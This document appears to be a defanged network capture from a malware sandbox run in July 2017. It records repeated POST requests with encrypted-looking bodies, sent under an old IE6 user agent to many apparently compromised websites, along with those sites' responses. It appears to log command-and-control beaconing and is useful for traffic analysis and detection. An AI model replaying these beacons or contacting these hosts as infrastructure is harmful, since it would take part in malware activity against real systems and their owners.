Z=T..^nC.sp....4<\..@.../}G ...1.gj,^.^.t.2X.....)k.\u...../(-]!./.
&.vm....O..p.r5.I.N..xnd_.g....h..d ..4...8.-..r....g..'p.............
0...0...U.......0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://www
.symauth.com/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-OFF-530...U........t...~.v.....`..C.d0...U.#..0....w.iHG.S.....2v...
..0...*.H.............b.....D.o.[...M.1.....i:.Y.5%e..q..[......O

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/YHKj6JjF6UBieQioTYpFsuEriQQUtnf6aUhHn1MS1cLqBzJ2B9GXBxkCEBh39mVop4K7qftC2uROM9c= HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: s.symcd.com


HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1736
content-transfer-encoding: binary
Cache-Control: max-age=310891, public, no-transform, must-revalidate
Last-Modified: Wed, 28 Jun 2017 01:37:36 GMT
Expires: Wed, 5 Jul 2017 01:37:36 GMT
Date: Sat, 01 Jul 2017 11:17:25 GMT
Connection: keep-alive
0..........0..... .....0......0...0........t...~.v.....`..C.d..2017062
8013736Z0s0q0I0... ........?`r.....@by..M.E.. ....w.iHG.S.....2v......
..w.eh.....B..N3.....20170628013736Z....20170705013736Z0...*.H........
.....(F.5$..@.x....1...7....z.`..`.....sH.@G?8...NPz...V%.........q# E
(.5..=.>Q..N.D.T.....f.X....H......-9\....O.q.tQ.C.Gi...!.. .5...W.
...........t.,=.}.........TtB.....,.. v...._&.~B|H.r...f1}...I.}$^..QH
@.P.7.O .>?.l..*^.(^L(;Q..;.............(*...d>.....G.....0...0.
..0..........c..*.:Y......Yk`0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008 Ve
riSign, Inc. - For authorized use only1806..U.../VeriSign Universal Ro
ot Certification Authority0...161122000000Z..171214235959Z0..1.0...U..
..US1.0...U....Symantec Corporation1.0...U....Symantec Trust Network11
0/..U...(Symantec Universal Root OCSP Responder 50.."0...*.H..........
...0..........F8$-..E....?.T....D...h..~...9.......0.....f@1...M...F..
e.5c.V.....r....ox.l..:t....,......6R..E.g...'oTB....`E 7...uz.;(B...~
Z=T..^nC.sp....4<\..@.../}G ...1.gj,^.^.t.2X.....)k.\u...../(-]!./.
&.vm....O..p.r5.I.N..xnd_.g....h..d ..4...8.-..r....g..'p.............
0...0...U.......0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://www
.symauth.com/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-OFF-530...U........t...~.v.....`..C.d0...U.#..0....w.iHG.S.....2v...
..0...*.H.............b.....D.o.[...M.1.....i:.Y.5%e..q..[......O

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 424
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: jeangatz.com
Connection: Keep-Alive
Cache-Control: no-cache

ghAvzPQ70oqlhanWTzbT50dvBYPsCxW5aNB66oVa0TKNMttTXm/E4AYWqu3uYWlfmXP32NTnSmRmU29v57qr157MlIdvqI2JSdpEq10MS3lt MdzYYjI3iJb448UIkClAoNiwcP19ZLEbTCp yxT/pLrn/u8IV6z0zUZ jDSsZPivmn/ff7KZIzjUHVoKJneYaHOyxjwHCgZbeEB6zCappfq5p TFluXWeXCiLwtN0TPshUpnZdj5FzaGLBqoUexI9QwguviCLxcISRAF9qz hgIgS0VtVQbd 6FEVp9LL05Dt7ptCloHMDPdVhapmvdcMP6BveZp2kQfll/vFnYuveVv1qSaApYcgUSVNsRhVjGNFr6BTq0e/1gTVeGlvW4hq8Vo  IbGc5Xh2jXeIYT4mnoGVAiooMVc/d1AA=
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 01 Jul 2017 11:17:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Sucuri-ID: 15017
3bb..<!DOCTYPE html>.<html lang="en" xmlns="hXXp://VVV.w3.org
/1999/xhtml">.<head>.<link rel="stylesheet" href="hXXps://
cdn.sucuri.net/sucuri-firewall-block.css" />.<section class="cen
ter clearfix">.<meta name="viewport" content="width=device-width
, initial-scale=1.0" />.<title>Sucuri WebSite Firewall - Acce
ss Denied</title>.<link href="hXXps://fonts.googleapis.com/cs
s?family=Open Sans:400,300,600,700" rel="stylesheet" type="text/css"&g
t;.</head>.<body>.<div id="main-container">.<head
er class="app-header clearfix">.<div class="wrap">.<a href
="hXXps://VVV.sucuri.net/" class="logo"></a>.<span class="
logo-neartext">Website Firewall</span>.<a href="hXXps://su
curi.net" class="site-link">Back to sucuri.net</a>.</div&g
t;.</header>.<noscript>.<div class="noscript">.<p
>Some parts of the interface required to process actions using Java
Script. Please add an exception in your browser to allow the execution
of JavaScript code in this domain.</p>.</div>.</noscri
pt>....4bd..<section class="app-content access-denied clearfix"&
gt;<div class="box center width-max-940"><h1 class="brand-fon
t font-size-xtra no-margin"><i class="icon-circle-red"></i
>Access Denied - Sucuri Website Firewall</h1>.<p class="me
dium-text code-snippet">If you are the site owner (or you manage th
is site), please whitelist your IP or if you think this block is a

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 428
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: stecom.nl
Connection: Keep-Alive
Cache-Control: no-cache

7KxkWrUPaYnXxEDxHN2zm66R6HFDRS0cuS80FgsQmxPGDrSe 4cgJ93KzjP OEmJlzEwoM/56 ZBx1gF0wZ1yGVG2TWs3LCvlZe20Ai tm537ajRcjYVPACTShlzuooaAe2SxsO80wlNgyJa/Om9s1 i3SrwV8t62EVCsl9mhw8QMxm8N9WoG72P/HmR4ziLA9ngazWygO8qDjQbd4Q5LDh ieVAWjEzZSeWjQlTWwWvJSb8/R1AD/t8cDOdrtJMZs2OjKEeEUWWUb r/UVHTUXOgD9xCfwpZYTa7m16bElQdX4t7W1Y21zGJ6nrCckKvS8r49PsCFVQUIk KsQM85vTGzSs GMLcF9sIKNW7wl/vX6cx2anv1BlPF321ElOP0xIZQiyQ/jxsedBRMybzC95Hy6NCK23wSL87vyjXgs=
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:17:29 GMT
Server: Apache
Location: hXXp://VVV.itgsolutions.nl/
Content-Length: 235
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.itgsolutions.nl/">here<
/a>.</p>.</body></html>.HTTP/1.1 301 Moved Perman
ently..Date: Sat, 01 Jul 2017 11:17:29 GMT..Server: Apache..Location:
hXXp://VVV.itgsolutions.nl/..Content-Length: 235..Keep-Alive: timeout=
5, max=100..Connection: Keep-Alive..Content-Type: text/html; charset=i
so-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.&l
t;html><head>.<title>301 Moved Permanently</title>
;.</head><body>.<h1>Moved Permanently</h1>.<
;p>The document has moved <a href="hXXp://VVV.itgsolutions.nl/"&
gt;here</a>.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 444
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: nazcapictures.com
Connection: Keep-Alive
Cache-Control: no-cache

CFGslTr95l0ucdT03eu4xH0ufuKq9axaDrO4Aw6sIaZMY6iz49uXZpTR bzqWy9CQBGTJuwyasTnc3tLR0baSQWVPhd7ugM0509T5J4t2jlaaaUMa9nyPhJfPH8Y9rNN/xD hk0jWSCRXBMsUnP2Ut5eyZIQfn3kiV0Jf3pzGgjCyCzGt0eEEI/VZfOQRu0rhU1lt8Tvuxoh1s2fJ7XsEN2gdXPcKgRoxkG6ZYNAo/DWXtrrj0krPsrgIe5JEHf8JEFJ Udvfo0eUtlCjUZkO3BZme9V85ycR1jxN9JT3hv4w2EbZXijf6XaxwcBVxOhlRXB4OONwPrsCIcTIRYmp/CbSbc7fQZtV0UWKylTCaTt6fm4dO6CeEhjxAoMKdoeLI0bUXXDQukf4bUdH4XVboL49l7F7Kny cei06rmqV7IwNC2 rpskw6fNw==
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:16:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=d9b971eb85b3b0d9d76d6754881698c6d1498907798; expires=Sun, 01-Jul-18 11:16:38 GMT; path=/; domain=.nazcapictures.com; HttpOnly
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f449e3538219-KBP
1222..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.msasys.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 01 Jul 2017 11:17:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-UA-Compatible: IE=edge
X-Pingback: hXXp://VVV.msasys.com/xmlrpc.php
Link: <hXXp://VVV.msasys.com/wp-json/>; rel="hXXps://api.w.org/"
Link: <hXXp://wp.me/P6RWve-5d>; rel=shortlink
X-Cacheable: bot
Cache-Control: max-age=10800, must-revalidate
X-Cache: HIT: 10
X-Pass-Why: 
X-Cache-Group: bot
X-Type: default
7e38..<!DOCTYPE html>..<!--[if IE 7]>..<html class="ie 
ie7" lang="en-US" prefix="og: hXXp://ogp.me/ns#">..<![endif]--&g
t;..<!--[if IE 8]>..<html class="ie ie8" lang="en-US" prefix=
"og: hXXp://ogp.me/ns#">..<![endif]-->..<!--[if !(IE 7) |
!(IE 8) ]><!-->..<html lang="en-US" prefix="og: hXXp://og
p.me/ns#">..<!--<![endif]-->..<head>..<meta chars
et="UTF-8">..<meta http-equiv="X-UA-Compatible" content="IE=edge
,chrome=1">..<meta name="viewport" content="width=device-width,
initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=0" /&
gt;..<title>Home - MSA Systems, Inc.</title>..<link hre
f="hXXp://VVV.msasys.com/wp-content/themes/msasystems-ubd/style.css" r
el="stylesheet" type="text/css">..<link href='hXXp://fonts.googl
eapis.com/css?family=Lato:300,400,700,300italic,400italic|Alegreya San
s SC:400' rel='stylesheet' type='text/css'>..<link href="hXXp://
VVV.msasys.com/wp-content/themes/msasystems-ubd/favicon.ico" rel="shor
tcut icon" type="image/x-icon">..<link href="hXXp://VVV.msasys.c
om/wp-content/themes/msasystems-ubd/favicon.ico" rel="icon" type="imag
e/x-icon">..<link href="hXXp://VVV.msasys.com/xmlrpc.php" rel="p
ingback">..<link href="hXXp://gmpg.org/xfn/11" rel="profile">
..<script src="hXXp://ajax.googleapis.com/ajax/libs/jquery/1.10.2/j
query.min.js"></script>..<script src="hXXp://VVV.msasys.co
m/wp-content/themes/msasystems-ubd/js/main.js"></script>.

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: s2s.fr
Connection: Keep-Alive
Cache-Control: no-cache

0sTfKgcL2GB1hTkqNkx7T9D2beT9z/iNK0eZ7Dq4QSIeyh6goo7h0m6eKKRfFt6DqZdYdDAirRaqTVAiXyonvzsKncqjd7Xps5UaNGVg8YxZhDOBqM8U3xYrgQfDNaDhk2OZ7YfmJ8Y9IoMZvAIdHMNush7bn5mGHZfi1mlPiM7PYKkTw6rKqH61zHR4Z/QFOKFz1vjhJ 8xQH3QI/0BZ7SczapiuTAnUVczgIBtq6LnCTRdq /i34B3 ZAyEixfJM/o71VGDT Eb2XRSSue/RtL48IcCjqpdIiA5VGX113RhO1vvGAYcjL5BgwQGLir5VDfJAZjFZ4ZhLpfPNswenUaL8oFr36lAIMo2VKS4nViPdj4R/X4eZjc/WSI1JVHi4TN1Ne30C4EI0T/aOeKjBTJBHeBwlNbd9AIAbbxIKIyo9BHQxp95C5jfGX8SpTzpaSn8n0mzsaInBbzLXSQmLpXw7yohK0RmVSqSEt9a3yxDjVh4Yhm
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:41 GMT
Server: Apache
Last-Modified: Tue, 12 Nov 2013 16:51:43 GMT
ETag: "c0d71-bae-4eafda9d16569"
Accept-Ranges: bytes
Content-Length: 2990
Vary: Accept-Encoding
X-Powered-By: PleskLin
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
.<!-- saved from url=(0035)hXXp://VVV.e-partenaire.fr/reserve/ --&g
t;.<html><head><meta http-equiv="Content-Type" content=
"text/html; charset=ISO-8859-1">...<title>onduleur onduleurs
s2s batterie condensateur eclairage electricite securite</title>
.......<meta name="Keywords" content="onduleur, onduleurs, s2s, sec
urite, electricite, alimentation, batterie, batteries, transformateur,
eclairage de securite, s2s paris, s2s lyon, s2s bron, s2s strasbourg,
s2s siege, s2s sav, s2s maintenance, s2s recrutement, s2s plan d'acce
s, informatique, syrius, syrius slt, syrius spv, syrius upgrade, syriu
s upscale, syrius sps, syrius dpa, transformateur triphases, transform
ateurs monophases, redresseur, eclairage, condensateurs, condensateur,
onduleur photovoltaique, onduleur solaire, onduleur modulaire, ondule
ur d.centralis., onduleur en parall.le, sav onduleur, maintenance ondu
leur, contrat de maintenance onduleur, installation onduleur, inverseu
r statique, transfert statique, inverseur statique" />.<meta na
me="Description" content="S2S, leader en onduleur modulaire, vous pres
ente ses solutions en protection electrique et vous permet d'apreneurs
| 83520 ROQUEBRUNE SUR ARGENS | Tel. 0826 100 441 | Fax. 0826 100 44
2<br />......International : Tel. 33 4 94 44 56 94 | Fax. 33 4
94 44 56 95 | Cr.ation : <a href="hXXp://VVV.e-partenaire.fr" targ
et="_blank">e-partenaire</a><br /><br /><br /&
gt;......<br />.....</td>....</tr>.............&

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.racknstackwarehouse.com.au
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 01 Jul 2017 11:17:04 GMT
Content-Type: text/html
Content-Length: 8639
Last-Modified: Tue, 28 Mar 2017 01:13:05 GMT
Connection: keep-alive
ETag: "58d9b8a1-21bf"
X-Powered-By: PleskLin
Accept-Ranges: bytes
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<meta http-e
quiv="Content-Type" content="text/html; charset=UTF-8" />...<tit
le>Rack 'n Stack Warehouse</title>...<link rel="stylesheet
" type="text/css" href="css/racknstack.css" media="all" />.. <
;link href="hXXps://fonts.googleapis.com/css?family=Quattrocento Sans"
rel="stylesheet"> .. <link rel="stylesheet" type="text/css"
href="engine1/style.css" />.. <meta name="viewport" content="
width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1"
/>...<link rel="stylesheet" type="text/css" media="only screen a
nd (max-device-width: 450px)" href="css/racknstack-mobile.css" />..
<link rel="stylesheet" type="text/css" media="only screen and (
max-device-width: 450px)" href="engine1/style-mobile.css" />...<
script src="engine1/jquery.js"></script>.. <meta name="
description" content="Are looking for shelving, workbenches or pallet
racking in Townsville, there is no one better than Rack n Stack. Don&#
039;t buy 2nd hand till you obtain a quote from us. Offering Long Span
Shelving, Budget shelving, Mezzanine Floors, pallet racking new and 2
nd hand"/>...<meta prefix="og: hXXp://ogp.me/ns#" property="og:t
ype" content="article"/>...<meta prefix="og: hXXp://ogp.me/ns#"
property="og:title" content="Home"/>...<meta prefix="og: htt

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 456
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: solutioncorp.com
Connection: Keep-Alive
Cache-Control: no-cache

YR2wS0fmc2Q6AXEfdu4AARCwHP89rH8Da3b3ewyRfQpsbn0gWze6t3tg4kRTElt0109nxO6RCxPJ8YYgcU2odACC9WPcTl4zHLwDpF4ew0mnVk/hzLwjJvKsYruuU3wnTGcNu9 Ol2jn uhmd90qvbK9Q0wRhPwhoXkuT1M4GlaOIWelkiTxgYjnB1DyfnsP5TD iCo1iQlmDtn5GrDb1N7itxS0bQgS2j7dNHr iQkrt7Lo3FnIknhmHe1yy/ig3CWxvQSebexPCulOsgrOV8wgpgEDkJAFrXHI4O7dA1yVjMi8fPdD3dosrvYHBw0SLJF7wQEk2VFoyEBHQJ9Rizd3zXaUzQ58UbpjAkfCyj4VgDFLv7A0hVkBO34ZffxqNsi9ZThE8mN05g pAXIC4VMHqe4cfrGCyX76BT7tFNNo2WXn3jlJaUNE 4QKdiV7cxRNaQ==
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:46 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d0fbd217b34d0e5411957c2c9e234607e1498907805; expires=Sun, 01-Jul-18 11:16:45 GMT; path=/; domain=.solutioncorp.com; HttpOnly
Location: hXXp://VVV.solutioncorp.com/
Server: cloudflare-nginx
CF-RAY: 3778f479a5348219-KBP
13d..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>301 Moved Permanently</title>.<
/head><body>.<h1>Moved Permanently</h1>.<p>
The document has moved <a href="hXXp://VVV.solutioncorp.com/">he
re</a>.</p>.<hr>.<address>Apache/2.2.15 (CentO
S) Server at solutioncorp.com Port 80</address>.</body><
;/html>..1.....0..HTTP/1.1 301 Moved Permanently..Date: Sat, 01 Jul
2017 11:16:46 GMT..Content-Type: text/html; charset=iso-8859-1..Trans
fer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d0
fbd217b34d0e5411957c2c9e234607e1498907805; expires=Sun, 01-Jul-18 11:1
6:45 GMT; path=/; domain=.solutioncorp.com; HttpOnly..Location: http:/
/VVV.solutioncorp.com/..Server: cloudflare-nginx..CF-RAY: 3778f479a534
8219-KBP..13d..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
;.<html><head>.<title>301 Moved Permanently</titl
e>.</head><body>.<h1>Moved Permanently</h1>
.<p>The document has moved <a href="hXXp://VVV.solutioncorp.c
om/">here</a>.</p>.<hr>.<address>Apache/2.2
.15 (CentOS) Server at solutioncorp.com Port 80</address>.</b
ody></html>..1.....0..

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 528
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: isle-karnataka.org
Connection: Keep-Alive
Cache-Control: no-cache

Uj4if9hB5l2VqpCx21t0LctCO9Og0fvljCLmVooYZYPpCV/g0v8Acawbx1t6vrKjwGxxBWf1L9qr7vdBlzr JeEsekpNBSn6rkjyFl0V2Pf9YoWBsAhau4UH7LNQ930B 8XYwn7dyfYckou/5tGTFcriDD7zKi D1o0Fp/vineROJ1jdUBc7f IKGw6Jdqt8xo8BzIPfyweIMgwU uvLcyEmagZx6qkIr9WeO2O57lmAR6dCGqxxK/VBe 9ylf8Q/lC9qpGDcVnpskLq8N4qwC5PhPv/c7MFUqOjm5WSX8IHkYN7WNVFnCGVw28tfbUeKxZSzED01ONmXiY8eRkPmDJj26Na PP BKCpX4QUcNB3BGHTnh9wEIBewYXjJWJ0m9NQ5jADUd qf8O5b2ie1csNufXDehLNljn0 Mqxl/45PaKLJg6pgasz3haJm4EYNwAslz6AvpIh0pIfc2JV2zwC9CTdxMHfaC3pb1rsIzmL NZjdFgs/3PiZo TrEXwiUDrR 9Ss7YfOQPL
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:38 GMT
Server: Apache
Link: <hXXp://isle-karnataka.org/wp-json/>; rel="hXXps://api.w.org/"
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
1f88..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<ht
ml xmlns="hXXp://VVV.w3.org/1999/xhtml" dir="ltr" xml:lang="ja" lang="
ja" xmlns:fb="hXXp://VVV.facebook.com/2008/fbml">.<head>.<
meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
;.<title>.......................................</title>.&
lt;meta name="viewport" content="width=device-width, initial-scale=1.0
" />.<meta name="keywords" content="" />.<meta name="descr
iption" content="Just another WordPress site" />.<meta http-equi
v="Content-Style-Type" content="text/css" />.<meta http-equiv="C
ontent-Script-Type" content="text/javascript" />.<!--[if IE]>
<meta http-equiv="imagetoolbar" content="no" /><![endif]-->
;..<link rel="stylesheet" href="hXXp://isle-karnataka.org/wp-conten
t/themes/keni62_wp_corp_1705192337/common.css" type="text/css" media="
all" />.<link rel="stylesheet" href="hXXp://isle-karnataka.org/w
p-content/themes/keni62_wp_corp_1705192337/layout.css" type="text/css"
media="all" />.<link rel="stylesheet" href="hXXp://isle-karnata
ka.org/wp-content/themes/keni62_wp_corp_1705192337/design.css" type="t
ext/css" media="all" />.<link rel="stylesheet" href="hXXp://isle
-karnataka.org/wp-content/themes/keni62_wp_corp_1705192337/mobile.css"
type="text/css" media="all" />.<link rel="stylesheet" href="htt
p://isle-karnataka.org/wp-content/themes/keni62_wp_corp_1705192337

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 460
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: al-mawared.com
Connection: Keep-Alive
Cache-Control: no-cache

BdEclVOo3l18jNHQGpHpJ/wZ84o5RaPjNys0Ohc59Zs60oAWofbiDa74A//Wf7Iv0hel5k5MA2YlGtzip3W/4TIJq6ipwADLfSkit1nB2vuy8d994t6WxdRBLhWoROjANnrq8Q9kVNtYk9h9RpPfa7nQOaYS2ux1ydXOY6ta8m2OutWosiwt520WFiN7Rq4BPhkPbllR 9L2CtEsp45GD8Efm4ExXhCfAqwv/pHmHCAePaW 43meDnYBzlB6aQKp2X3XWU0x/JtnU zpRmruyg4eqiJa5HfBGxwfSvNz 0O0vv/rYB3qD//uNDoWO7ebU7O3YdR26SYH/DwZHXTIz3Ft64XXM7k4Nh85zKc1dsYCL8AaphNoJTHgOFOLHKuH4RctR1jshEVT5z3pK8JsDdDjFoKq01xApWh8uKbBp6Y/sRiqfFh8LYCaeKYue CvTXLQj6Ul1riV

"table5" bgcolor="#FFFFFF">...<TR>....<TD>.....<IMG 
SRC="images/spacer.gif" WIDTH=200 HEIGHT=1></TD>....<TD>
;.....<IMG SRC="images/spacer.gif" WIDTH=4 HEIGHT=1></TD>.
...<TD>.....<IMG SRC="images/spacer.gif" WIDTH=10 HEIGHT=1>
;</TD>....<TD>.....<IMG SRC="images/spacer.gif" WIDTH=9
1 HEIGHT=1></TD>....<TD>.....<IMG SRC="images/spacer
.gif" WIDTH=42 HEIGHT=1></TD>....<TD>.....<IMG SRC="
images/spacer.gif" WIDTH=46 HEIGHT=1></TD>....<TD>.....
<IMG SRC="images/spacer.gif" WIDTH=90 HEIGHT=1></TD>....&l
t;TD>.....<IMG SRC="images/spacer.gif" WIDTH=2 HEIGHT=1></
TD>....<TD>.....<IMG SRC="images/spacer.gif" WIDTH=1 HEIGH
T=1></TD>....<TD>.....<IMG SRC="images/spacer.gif" W
IDTH=89 HEIGHT=1></TD>....<TD>.....<IMG SRC="images/
spacer.gif" WIDTH=89 HEIGHT=1></TD>....<TD>.....<IMG
SRC="images/spacer.gif" WIDTH=19 HEIGHT=1></TD>....<TD>
;.....<IMG SRC="images/spacer.gif" WIDTH=48 HEIGHT=1></TD>
...</TR>...<TR>....<TD>.....<IMG SRC="images/mawa
red_main04_01.gif" WIDTH=200 HEIGHT=63></TD>....<TD COLSPA
N=7>.....<IMG SRC="images/mawared_main04_02.gif" WIDTH=285 HEIGH
T=63></TD>....<TD COLSPAN=5>.....<IMG SRC="images/ma
wared_main04_03.gif" WIDTH=246 HEIGHT=63></TD>...</TR>.
..<TR>....<TD COLSPAN=2>.....<IMG SRC="images/mawar

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 516
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: brijindia.com
Connection: Keep-Alive
Cache-Control: no-cache

SaJUwEtBGl4v70H5oiYb2rQ1hNuRjQSBr181KHsbNT94Z4yM1YkYlYFAdrAptGxHbshVzZvvWvZnGWFgcL 4wjc6dVPD4DCGrjmMP8UHQkEqB trLZSU8uDEhKPOBK8X6WPD3Yx595WUGs6rH785T61nfDQrkSuBgaBZ0g8ILMaN6gJ7Fhawnwg4VnCK5R4VgRuyE14YwaT2W/18pm1/LXeRfMKAX9kwiYVIlB7yC9vZQvQKRLCEh4UgEtD4i11/hCOgw/C esC1o2DtG8A9gyM/so2bFUF5KNvfg46wmEY5Wh534Y4QRDCpO1319BGfcT0gAVgdDFVJs6SeDCLeh/CtrAd9yB0xh1X6qQevDctABSViFn669xUIBYWq0qANDv5 Lzv5gHriDmCBei3a1GVM4YQjutt7ySxYjrB8G/UAA1Hbc8fE1mk6fz6lT0Kmjpzijn8oVfT9gc7 v5xQNhFfCj/ysZW5JYjALxGEKlsaP9wR0upVoZQU3sFm0qLqBQ==
HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, OPTIONS, TRACE
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Sat, 01 Jul 2017 11:16:40 GMT
Content-Length: 1293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>405
- HTTP verb used to access this page is not allowed.</title>..&l
t;style type="text/css">..<!--..body{margin:0;font-size:.7em;fon
t-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..f
ieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color
:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.
2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0
0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-ser
if;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;p
osition:relative;}...content-container{background:#FFF;width:96%;margi
n-top:8px;padding:10px;position:relative;}..-->..</style>..&l
t;/head>..<body>..<div id="header"><h1>Server Err
or</h1></div>..<div id="content">.. <div class="c
ontent-container"><fieldset>.. <h2>405 - HTTP verb use
d to access this page is not allowed.</h2>.. <h3>The page
you are looking for cannot be displayed because an invalid method (HT
TP verb) was used to attempt access.</h3>.. </fieldset><
;/div>..</div>..</body>..</html>....

<<< skipped >>>

POST / HTTP/1.1
